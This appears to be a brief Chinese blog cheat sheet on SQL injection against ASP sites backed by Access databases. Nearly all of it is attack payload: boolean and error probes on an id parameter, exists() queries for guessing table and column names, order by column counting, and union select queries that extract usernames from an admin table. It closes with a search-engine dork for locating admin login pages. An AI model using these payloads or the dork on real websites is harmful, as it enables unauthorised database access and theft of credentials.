xxx.xx.xx/xx.asp?id=1 and 1=1
xxx.xx.xx/xx.asp?id=1’; //error is access ,else sql
access ZR:
xxx.xx.xx/xx.asp?id=1 and 1=1
xxx.xx.xx/xx.asp?id=1 and 1=2
xxx.xx.xx/xx.asp?id=1 and exists (select * from 你要猜得表名)
and exists (select 你要猜的字段名 from 你已经才出来的表名)
xxx.xx.xx/xx.asp?id=1 order by N
xxx.xx.xx/xx.asp?id=1 union select 1,2,3 from admin
xxx.xx.xx/xx.asp?id=1 union select 1,username,3 from admin
利用搜索引擎寻找网站后台
搜索引擎输入 ——
inurl:(admin=asp?)
sql注入探索
最新推荐文章于 2024-05-31 09:31:11 发布